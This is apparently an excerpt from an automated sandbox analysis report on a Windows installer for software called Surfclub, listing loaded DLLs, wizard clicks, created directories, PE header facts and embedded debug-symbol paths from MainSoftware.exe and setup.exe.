    Source: C:\Program Files\Surfclub\Install.exeSection loaded: kernel.appcore.dll
    Source: C:\Program Files\Surfclub\Install.exeSection loaded: icu.dll
    Source: C:\Program Files\Surfclub\Install.exeSection loaded: iphlpapi.dll
    Source: C:\Program Files\Surfclub\Install.exeSection loaded: dnsapi.dll
    Source: C:\Program Files\Surfclub\Install.exeSection loaded: dhcpcsvc6.dll
    Source: C:\Program Files\Surfclub\Install.exeSection loaded: dhcpcsvc.dll
    Source: C:\Program Files\Surfclub\Install.exeSection loaded: winnsi.dll
    Source: C:\Program Files\Surfclub\Install.exeSection loaded: winhttp.dll
    Source: C:\Program Files\Surfclub\Install.exeSection loaded: ondemandconnroutehelper.dll
    Source: C:\Program Files\Surfclub\Install.exeSection loaded: mswsock.dll
    Source: C:\Users\user\Desktop\setup.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32Jump to behavior
    Source: C:\Users\user\Desktop\setup.exeAutomated click: Next >
    Source: C:\Users\user\Desktop\setup.exeAutomated click: I accept the terms in the License Agreement
    Source: C:\Users\user\Desktop\setup.exeAutomated click: Next >
    Source: C:\Users\user\Desktop\setup.exeAutomated click: Next >
    Source: C:\Users\user\Desktop\setup.exeAutomated click: Install
    Source: Window RecorderWindow detected: More than 3 window changes detected
    Source: C:\Program Files\Surfclub\Install.exeDirectory created: C:\Program Files\Surfclub\Surfclub.exe
    Source: C:\Program Files\Surfclub\Surfclub.exeDirectory created: C:\Program Files\Surfclub\uuid
    Source: C:\Program Files\Surfclub\Surfclub.exeDirectory created: C:\Program Files\Surfclub\domains
    Source: setup.exeStatic PE information: Virtual size of .text is bigger than: 0x100000
    Source: setup.exeStatic file information: File size 34351080 > 1048576
    Source: setup.exeStatic PE information: Raw size of .text is bigger than: 0x100000 < 0x2c7e00
    Source: setup.exeStatic PE information: More than 200 imports for KERNEL32.dll
    Source: setup.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
    Source: setup.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
    Source: setup.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
    Source: setup.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
    Source: setup.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
    Source: setup.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
    Source: setup.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
    Source: setup.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
    Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Threading.Thread\Release\net8.0\System.Threading.Thread.pdb source: MainSoftware.exe, 00000013.00000002.2503002446.0000020F3A5F0000.00000002.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000018.00000002.2574581744.000001A50AC90000.00000002.00000001.00040000.0000000A.sdmp
    Source: Binary string: System.Net.Sockets.ni.pdb source: MainSoftware.exe, 00000013.00000002.2502593462.0000020F3A561000.00000020.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000013.00000002.2502506832.0000020F3A521000.00000002.00000001.00040000.0000000A.sdmp
    Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Text.Json\Release\net8.0\System.Text.Json.pdb source: MainSoftware.exe, 00000013.00000002.2489583229.0000020F375AC000.00000002.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000013.00000002.2489694248.0000020F37641000.00000020.00000001.00040000.0000000A.sdmp
    Source: Binary string: /_/artifacts/obj/System.Runtime.InteropServices.RuntimeInformation/Release/net8.0-windows/System.Runtime.InteropServices.RuntimeInformation.pdb source: MainSoftware.exe, 00000013.00000002.2489300922.0000020F37511000.00000002.00000001.00040000.0000000A.sdmp
    Source: Binary string: Microsoft.Win32.Registry.ni.pdb source: MainSoftware.exe, 00000013.00000002.2489560998.0000020F37591000.00000020.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000013.00000002.2489475473.0000020F37577000.00000002.00000001.00040000.0000000A.sdmp
    Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Diagnostics.DiagnosticSource\Release\net8.0\System.Diagnostics.DiagnosticSource.pdbSHA256P?> source: MainSoftware.exe, 00000013.00000002.2488437888.0000020F37113000.00000002.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000013.00000002.2488514061.0000020F37141000.00000020.00000001.00040000.0000000A.sdmp
    Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Security.Cryptography\Release\net8.0-windows\System.Security.Cryptography.pdb source: MainSoftware.exe, 00000013.00000002.2488665246.0000020F37216000.00000002.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000013.00000002.2488782180.0000020F372E1000.00000020.00000001.00040000.0000000A.sdmp
    Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Net.Ping\Release\net8.0-windows\System.Net.Ping.pdb source: MainSoftware.exe, 00000013.00000002.2487646877.0000020F35470000.00000002.00000001.00040000.0000000A.sdmp
    Source: Binary string: /_/artifacts/obj/System.Security.Cryptography.X509Certificates/Release/net8.0-windows/System.Security.Cryptography.X509Certificates.pdb source: MainSoftware.exe, 00000013.00000002.2488665246.0000020F37211000.00000002.00000001.00040000.0000000A.sdmp
    Source: Binary string: System.Net.Security.ni.pdb source: MainSoftware.exe, 00000013.00000002.2488625597.0000020F371C1000.00000020.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000013.00000002.2488546167.0000020F37179000.00000002.00000001.00040000.0000000A.sdmp
    Source: Binary string: System.Security.Principal.Windows.ni.pdb source: MainSoftware.exe, 00000013.00000002.2503289063.0000020F3A631000.00000020.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000013.00000002.2503182962.0000020F3A611000.00000002.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000018.00000002.2575095760.000001A50ACF1000.00000020.00000001.00040000.0000000A.sdmp
    Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Collections.NonGeneric\Release\net8.0\System.Collections.NonGeneric.pdb source: MainSoftware.exe, 00000013.00000002.2489276519.0000020F37501000.00000020.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000013.00000002.2489234377.0000020F374F1000.00000002.00000001.00040000.0000000A.sdmp
    Source: Binary string: System.ObjectModel.ni.pdb source: MainSoftware.exe, 00000013.00000002.2486229465.0000020F34474000.00000002.00000001.00040000.0000000A.sdmp
    Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Threading.Overlapped\Release\net8.0\System.Threading.Overlapped.pdbSHA256t source: MainSoftware.exe, 00000013.00000002.2502776162.0000020F3A5B1000.00000020.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000013.00000002.2502635521.0000020F3A5A2000.00000002.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000018.00000002.2574402265.000001A50AC51000.00000020.00000001.00040000.0000000A.sdmp
    Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Collections.Concurrent\Release\net8.0\System.Collections.Concurrent.pdb source: MainSoftware.exe, 00000013.00000002.2490110262.0000020F3775D000.00000002.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000013.00000002.2490316786.0000020F37781000.00000020.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000018.00000002.2555282561.000001A507DFD000.00000002.00000001.00040000.0000000A.sdmp
    Source: Binary string: System.Net.Http.Json.ni.pdb source: MainSoftware.exe, 00000013.00000002.2489453415.0000020F37561000.00000020.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000013.00000002.2489389183.0000020F3754A000.00000002.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000018.00000002.2554946567.000001A507DB1000.00000020.00000001.00040000.0000000A.sdmp
    Source: Binary string: C:\Users\Admin\Distributor\Installers Project\Generic\ConsoleApp1\obj\Release\net8.0\win-x64\ConsoleApp1.pdb source: MainSoftware.exe, 00000013.00000002.2485317241.000001CE9F771000.00000020.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000013.00000002.2485250859.000001CE9F767000.00000002.00000001.00040000.0000000A.sdmp
    Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Net.NameResolution\Release\net8.0-windows\System.Net.NameResolution.pdb source: MainSoftware.exe, 00000013.00000002.2502957878.0000020F3A5E1000.00000020.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000013.00000002.2502832383.0000020F3A5CD000.00000002.00000001.00040000.0000000A.sdmp
    Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Linq\Release\net8.0\System.Linq.pdb source: MainSoftware.exe, 00000013.00000002.2487020549.0000020F351A3000.00000002.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000013.00000002.2487094284.0000020F351D1000.00000020.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000018.00000002.2540077777.0000016470123000.00000002.00000001.00040000.0000000A.sdmp
    Source: Binary string: System.Text.Json.ni.pdb source: MainSoftware.exe, 00000013.00000002.2489583229.0000020F375AC000.00000002.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000013.00000002.2489694248.0000020F37641000.00000020.00000001.00040000.0000000A.sdmp
    Source: Binary string: System.Linq.ni.pdb source: MainSoftware.exe, 00000013.00000002.2487020549.0000020F351A3000.00000002.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000013.00000002.2487094284.0000020F351D1000.00000020.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000018.00000002.2540077777.0000016470123000.00000002.00000001.00040000.0000000A.sdmp
    Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Diagnostics.Tracing\Release\net8.0\System.Diagnostics.Tracing.pdb source: MainSoftware.exe, 00000013.00000002.2487832561.0000020F354C9000.00000002.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000013.00000002.2487899580.0000020F354D1000.00000020.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000018.00000002.2546435914.000001A505E01000.00000020.00000001.00040000.0000000A.sdmp
    Source: Binary string: System.ComponentModel.EventBasedAsync.ni.pdb source: MainSoftware.exe, 00000013.00000002.2489144792.0000020F374C2000.00000002.00000001.00040000.0000000A.sdmp
    Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Numerics.Vectors\Release\net8.0\System.Numerics.Vectors.pdbSHA256 source: MainSoftware.exe, 00000013.00000002.2489977509.0000020F3773C000.00000002.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000013.00000002.2490087775.0000020F37741000.00000020.00000001.00040000.0000000A.sdmp
    Source: Binary string: /_/src/Serilog/obj/Release/net8.0/Serilog.pdb source: MainSoftware.exe, 00000013.00000002.2487213233.0000020F35241000.00000020.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000013.00000002.2487133129.0000020F3520D000.00000002.00000001.00040000.0000000A.sdmp
    Source: Binary string: wininet.pdbUGP source: setup.exe, 00000000.00000003.1755437103.0000000009AC9000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000006.00000003.1932053520.000000000784C000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Net.Http\Release\net8.0-windows\System.Net.Http.pdbSHA256 source: MainSoftware.exe, 00000013.00000002.2487586989.0000020F353C1000.00000020.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000013.00000002.2487462974.0000020F35318000.00000002.00000001.00040000.0000000A.sdmp
    Source: Binary string: System.Collections.ni.pdb source: MainSoftware.exe, 00000013.00000002.2485624708.000001CE9F8F1000.00000020.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000013.00000002.2485552514.000001CE9F8C9000.00000002.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000018.00000002.2539907807.00000164700D9000.00000002.00000001.00040000.0000000A.sdmp
    Source: Binary string: System.Private.CoreLib.ni.pdb source: MainSoftware.exe, 00000013.00000002.2486648118.0000020F34911000.00000020.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000013.00000002.2486229465.0000020F3447E000.00000002.00000001.00040000.0000000A.sdmp
    Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Private.Uri\Release\net8.0\System.Private.Uri.pdb source: MainSoftware.exe, 00000013.00000002.2488949645.0000020F373C7000.00000002.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000013.00000002.2489017313.0000020F373F1000.00000020.00000001.00040000.0000000A.sdmp
    Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Net.Primitives\Release\net8.0-windows\System.Net.Primitives.pdb source: MainSoftware.exe, 00000013.00000002.2487646877.0000020F3547B000.00000002.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000013.00000002.2487805041.0000020F354A1000.00000020.00000001.00040000.0000000A.sdmp
    Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Threading\Release\net8.0\System.Threading.pdb source: MainSoftware.exe, 00000013.00000002.2484894819.000001CE9DE41000.00000020.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000013.00000002.2488855338.0000020F373AB000.00000002.00000001.00040000.0000000A.sdmp
    Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Threading.Thread\Release\net8.0\System.Threading.Thread.pdbSHA256 source: MainSoftware.exe, 00000013.00000002.2503002446.0000020F3A5F0000.00000002.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000018.00000002.2574581744.000001A50AC90000.00000002.00000001.00040000.0000000A.sdmp
    Source: Binary string: System.Security.Claims.ni.pdb source: MainSoftware.exe, 00000013.00000002.2503502815.0000020F3A671000.00000020.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000013.00000002.2503365504.0000020F3A657000.00000002.00000001.00040000.0000000A.sdmp
    Source: Binary string: /_/artifacts/obj/System.Security.Cryptography.X509Certificates/Release/net8.0-windows/System.Security.Cryptography.X509Certificates.pdbSHA256 source: MainSoftware.exe, 00000013.00000002.2488665246.0000020F37211000.00000002.00000001.00040000.0000000A.sdmp
    Source: Binary string: /_/artifacts/obj/System.Runtime.InteropServices.RuntimeInformation/Release/net8.0-windows/System.Runtime.InteropServices.RuntimeInformation.pdbSHA256 source: MainSoftware.exe, 00000013.00000002.2489300922.0000020F37511000.00000002.00000001.00040000.0000000A.sdmp
    Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.ObjectModel\Release\net8.0\System.ObjectModel.pdb source: MainSoftware.exe, 00000013.00000002.2486229465.0000020F34474000.00000002.00000001.00040000.0000000A.sdmp
    Source: Binary string: System.Net.Ping.ni.pdb source: MainSoftware.exe, 00000013.00000002.2487646877.0000020F35470000.00000002.00000001.00040000.0000000A.sdmp
    Source: Binary string: D:\a\_work\1\s\artifacts\obj\coreclr\System.Private.CoreLib\x64\Release\System.Private.CoreLib.pdb source: MainSoftware.exe, 00000013.00000002.2486648118.0000020F34911000.00000020.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000013.00000002.2486229465.0000020F3447E000.00000002.00000001.00040000.0000000A.sdmp
    Source: Binary string: C:\ReleaseAI\win\Release\custact\x86\SoftwareDetector.pdbn source: setup.exe, 00000000.00000003.1748683968.00000000098C0000.00000004.00001000.00020000.00000000.sdmp
    Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Net.Ping\Release\net8.0-windows\System.Net.Ping.pdbSHA256S source: MainSoftware.exe, 00000013.00000002.2487646877.0000020F35470000.00000002.00000001.00040000.0000000A.sdmp
    Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Memory\Release\net8.0\System.Memory.pdb source: MainSoftware.exe, 00000013.00000002.2503638847.0000020F3AA9C000.00000002.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000013.00000002.2503760658.0000020F3AAB1000.00000020.00000001.00040000.0000000A.sdmp
    Source: Binary string: /_/artifacts/obj/netstandard/Release/net8.0-windows/netstandard.pdb source: MainSoftware.exe, 00000013.00000002.2487355740.0000020F352C1000.00000020.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000013.00000002.2487291255.0000020F35298000.00000002.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000018.00000002.2544800776.000001A505BF1000.00000020.00000001.00040000.0000000A.sdmp
    Source: Binary string: C:\ReleaseAI\win\Release\stubs\x86\ExternalUi.pdb source: setup.exe, setup.exe, 00000000.00000002.2599874547.00000000005D9000.00000002.00000001.01000000.00000003.sdmp, setup.exe, 00000000.00000000.1723309056.00000000005D9000.00000002.00000001.01000000.00000003.sdmp, setup.exe, 00000006.00000000.1918855611.00000000005D9000.00000002.00000001.01000000.00000003.sdmp, setup.exe, 00000006.00000002.2566522747.00000000005D9000.00000002.00000001.01000000.00000003.sdmp
    Source: Binary string: System.Net.NameResolution.ni.pdb source: MainSoftware.exe, 00000013.00000002.2502957878.0000020F3A5E1000.00000020.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000013.00000002.2502832383.0000020F3A5CD000.00000002.00000001.00040000.0000000A.sdmp
    Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Security.Claims\Release\net8.0\System.Security.Claims.pdb source: MainSoftware.exe, 00000013.00000002.2503502815.0000020F3A671000.00000020.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000013.00000002.2503365504.0000020F3A657000.00000002.00000001.00040000.0000000A.sdmp
    Source: Binary string: System.Diagnostics.DiagnosticSource.ni.pdb source: MainSoftware.exe, 00000013.00000002.2488437888.0000020F37113000.00000002.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000013.00000002.2488514061.0000020F37141000.00000020.00000001.00040000.0000000A.sdmp
    Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Numerics.Vectors\Release\net8.0\System.Numerics.Vectors.pdb source: MainSoftware.exe, 00000013.00000002.2489977509.0000020F3773C000.00000002.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000013.00000002.2490087775.0000020F37741000.00000020.00000001.00040000.0000000A.sdmp
    Source: Binary string: System.Threading.ni.pdb source: MainSoftware.exe, 00000013.00000002.2484894819.000001CE9DE41000.00000020.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000013.00000002.2488855338.0000020F373AB000.00000002.00000001.00040000.0000000A.sdmp
    Source: Binary string: /_/artifacts/obj/System.Net/Release/net8.0-windows/System.Net.pdb source: MainSoftware.exe, 00000013.00000002.2489977509.0000020F37737000.00000002.00000001.00040000.0000000A.sdmp
    Source: Binary string: /_/src/Serilog.Sinks.Http/obj/Release/netstandard2.1/Serilog.Sinks.Http.pdb source: MainSoftware.exe, 00000013.00000002.2485737833.000001CE9F921000.00000020.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000013.00000002.2487246699.0000020F35279000.00000002.00000001.00040000.0000000A.sdmp
    Source: Binary string: C:\Users\Admin\Distributor\Bundle Project\MSIInstaller\obj\Release\net8.0\win-x64\linked\MSIInstaller.pdb source: setup.exe, 00000000.00000003.1996568847.000000000C6CA000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Runtime.InteropServices\Release\net8.0\System.Runtime.InteropServices.pdb source: MainSoftware.exe, 00000013.00000002.2489367223.0000020F37531000.00000020.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000013.00000002.2489300922.0000020F37515000.00000002.00000001.00040000.0000000A.sdmp
    Source: Binary string: /_/artifacts/obj/System.Numerics/Release/net8.0-windows/System.Numerics.pdb source: MainSoftware.exe, 00000013.00000002.2486229465.0000020F34470000.00000002.00000001.00040000.0000000A.sdmp
    Source: Binary string: /_/artifacts/obj/System.AppContext/Release/net8.0-windows/System.AppContext.pdbSHA256 source: MainSoftware.exe, 00000013.00000002.2490110262.0000020F37755000.00000002.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000018.00000002.2555282561.000001A507DF5000.00000002.00000001.00040000.0000000A.sdmp
    Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.ComponentModel.EventBasedAsync\Release\net8.0\System.ComponentModel.EventBasedAsync.pdb source: MainSoftware.exe, 00000013.00000002.2489144792.0000020F374C2000.00000002.00000001.00040000.0000000A.sdmp
    Source: Binary string: System.Net.NetworkInformation.ni.pdb source: MainSoftware.exe, 00000013.00000002.2503789563.0000020F3AACA000.00000002.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000013.00000002.2503877554.0000020F3AAE1000.00000020.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000018.00000002.2575358447.000001A50AD5A000.00000002.00000001.00040000.0000000A.sdmp
    Source: Binary string: #.Pdb source: setup.exe, 00000000.00000003.1996568847.000000000D2D5000.00000004.00000020.00020000.00000000.sdmp, MainSoftware.exe, 00000013.00000002.2490526230.0000020F377C1000.00000020.00000001.00040000.0000000A.sdmp
    Source: Binary string: wininet.pdb source: setup.exe, 00000000.00000003.1755437103.0000000009AC9000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000006.00000003.1932053520.000000000784C000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: System.Text.Encodings.Web.ni.pdb source: MainSoftware.exe, 00000013.00000002.2489754059.0000020F376DA000.00000002.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000013.00000002.2489851537.0000020F376F1000.00000020.00000001.00040000.0000000A.sdmp
    Source: Binary string: C:\ReleaseAI\win\Release\custact\x86\ShortcutFlags.pdb source: setup.exe, 00000000.00000003.1748683968.0000000009A2F000.00000004.00001000.00020000.00000000.sdmp
    Source: Binary string: System.Collections.Concurrent.ni.pdb source: MainSoftware.exe, 00000013.00000002.2490110262.0000020F3775D000.00000002.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000013.00000002.2490316786.0000020F37781000.00000020.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000018.00000002.2555282561.000001A507DFD000.00000002.00000001.00040000.0000000A.sdmp
    Source: Binary string: System.Diagnostics.Process.ni.pdb source: MainSoftware.exe, 00000013.00000002.2489043076.0000020F37463000.00000002.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000013.00000002.2489114931.0000020F37491000.00000020.00000001.00040000.0000000A.sdmp
    Source: Binary string: System.ComponentModel.Primitives.ni.pdb source: MainSoftware.exe, 00000013.00000002.2489210974.0000020F374E1000.00000020.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000013.00000002.2489144792.0000020F374C9000.00000002.00000001.00040000.0000000A.sdmp
    Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Net.NetworkInformation\Release\net8.0-windows\System.Net.NetworkInformation.pdb source: MainSoftware.exe, 00000013.00000002.2503789563.0000020F3AACA000.00000002.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000013.00000002.2503877554.0000020F3AAE1000.00000020.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000018.00000002.2575358447.000001A50AD5A000.00000002.00000001.00040000.0000000A.sdmp
    Source: Binary string: System.Private.Uri.ni.pdb source: MainSoftware.exe, 00000013.00000002.2488949645.0000020F373C7000.00000002.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000013.00000002.2489017313.0000020F373F1000.00000020.00000001.00040000.0000000A.sdmp
    Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Collections\Release\net8.0\System.Collections.pdb source: MainSoftware.exe, 00000013.00000002.2485624708.000001CE9F8F1000.00000020.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000013.00000002.2485552514.000001CE9F8C9000.00000002.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000018.00000002.2539907807.00000164700D9000.00000002.00000001.00040000.0000000A.sdmp
    Source: Binary string: /_/artifacts/obj/System.Text.Encoding/Release/net8.0-windows/System.Text.Encoding.pdb source: MainSoftware.exe, 00000013.00000002.2489754059.0000020F376D6000.00000002.00000001.00040000.0000000A.sdmp
    Source: Binary string: C:\ReleaseAI\win\Release\custact\x86\FileOperations.pdb source: setup.exe, 00000000.00000003.1748683968.0000000009A2F000.00000004.00001000.00020000.00000000.sdmp
    Source: Binary string: D:\a\_work\1\s\artifacts\obj\coreclr\windows.x64.Release\dlls\mscordac\mscordaccore.pdb source: setup.exe, 00000000.00000003.1996568847.000000000C549000.00000004.00000020.00020000.00000000.sdmp, MainSoftware.exe, MainSoftware.exe, 00000013.00000000.2458837623.00007FF736428000.00000002.00000001.01000000.0000000A.sdmp, SoftwareDistributor.exe
    Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Net.Security\Release\net8.0-windows\System.Net.Security.pdbSHA256 source: MainSoftware.exe, 00000013.00000002.2488625597.0000020F371C1000.00000020.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000013.00000002.2488546167.0000020F37179000.00000002.00000001.00040000.0000000A.sdmp
    Source: Binary string: D:\a\_work\1\s\artifacts\obj\Microsoft.Win32.Registry\Release\net8.0-windows\Microsoft.Win32.Registry.pdb source: MainSoftware.exe, 00000013.00000002.2489560998.0000020F37591000.00000020.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000013.00000002.2489475473.0000020F37577000.00000002.00000001.00040000.0000000A.sdmp
    Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Diagnostics.DiagnosticSource\Release\net8.0\System.Diagnostics.DiagnosticSource.pdb source: MainSoftware.exe, 00000013.00000002.2488437888.0000020F37113000.00000002.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000013.00000002.2488514061.0000020F37141000.00000020.00000001.00040000.0000000A.sdmp
    Source: Binary string: System.Collections.NonGeneric.ni.pdb source: MainSoftware.exe, 00000013.00000002.2489276519.0000020F37501000.00000020.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000013.00000002.2489234377.0000020F374F1000.00000002.00000001.00040000.0000000A.sdmp
    Source: Binary string: /_/artifacts/obj/System.Threading.Timer/Release/net8.0-windows/System.Threading.Timer.pdb source: MainSoftware.exe, 00000013.00000002.2488855338.0000020F373A7000.00000002.00000001.00040000.0000000A.sdmp
    Source: Binary string: /_/artifacts/obj/System.Threading.Tasks/Release/net8.0-windows/System.Threading.Tasks.pdb source: MainSoftware.exe, 00000018.00000002.2584299572.000001A50B57A000.00000002.00000001.00040000.0000000A.sdmp
    Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Diagnostics.Process\Release\net8.0-windows\System.Diagnostics.Process.pdb source: MainSoftware.exe, 00000013.00000002.2489043076.0000020F37463000.00000002.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000013.00000002.2489114931.0000020F37491000.00000020.00000001.00040000.0000000A.sdmp
    Source: Binary string: C:\ReleaseAI\win\Release\custact\x86\ShortcutFlags.pdbE source: setup.exe, 00000000.00000003.1748683968.0000000009A2F000.00000004.00001000.00020000.00000000.sdmp
    Source: Binary string: /_/artifacts/obj/System.Diagnostics.Debug/Release/net8.0-windows/System.Diagnostics.Debug.pdb source: MainSoftware.exe, 00000013.00000002.2488437888.0000020F37110000.00000002.00000001.00040000.0000000A.sdmp
    Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Threading.Overlapped\Release\net8.0\System.Threading.Overlapped.pdb source: MainSoftware.exe, 00000013.00000002.2502776162.0000020F3A5B1000.00000020.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000013.00000002.2502635521.0000020F3A5A2000.00000002.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000018.00000002.2574402265.000001A50AC51000.00000020.00000001.00040000.0000000A.sdmp
    Source: Binary string: System.Memory.ni.pdb source: MainSoftware.exe, 00000013.00000002.2503638847.0000020F3AA9C000.00000002.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000013.00000002.2503760658.0000020F3AAB1000.00000020.00000001.00040000.0000000A.sdmp
    Source: Binary string: D:\a\_work\1\s\artifacts\obj\Microsoft.Win32.Primitives\Release\net8.0\Microsoft.Win32.Primitives.pdb source: MainSoftware.exe, 00000013.00000002.2490472097.0000020F377B1000.00000020.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000013.00000002.2489475473.0000020F37573000.00000002.00000001.00040000.0000000A.sdmp
    Source: Binary string: /_/artifacts/obj/Microsoft.Extensions.Configuration.Abstractions/Release/net7.0/Microsoft.Extensions.Configuration.Abstractions.pdb source: MainSoftware.exe, 00000013.00000002.2487378762.0000020F352E0000.00000002.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000013.00000002.2487438441.0000020F35301000.00000020.00000001.00040000.0000000A.sdmp
    Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Threading.ThreadPool\Release\net8.0\System.Threading.ThreadPool.pdb source: MainSoftware.exe, 00000013.00000002.2488855338.0000020F373A3000.00000002.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000013.00000002.2503137120.0000020F3A601000.00000020.00000001.00040000.0000000A.sdmp
    Source: Binary string: /_/src/Serilog.Formatting.Compact/obj/Release/net8.0/Serilog.Formatting.Compact.pdb source: MainSoftware.exe, 00000013.00000002.2485427774.000001CE9F7A8000.00000002.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000013.00000002.2485674994.000001CE9F911000.00000020.00000001.00040000.0000000A.sdmp
    Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Text.Encoding.Extensions\Release\net8.0\System.Text.Encoding.Extensions.pdbSHA2560 source: MainSoftware.exe, 00000013.00000002.2489754059.0000020F376D2000.00000002.00000001.00040000.0000000A.sdmp
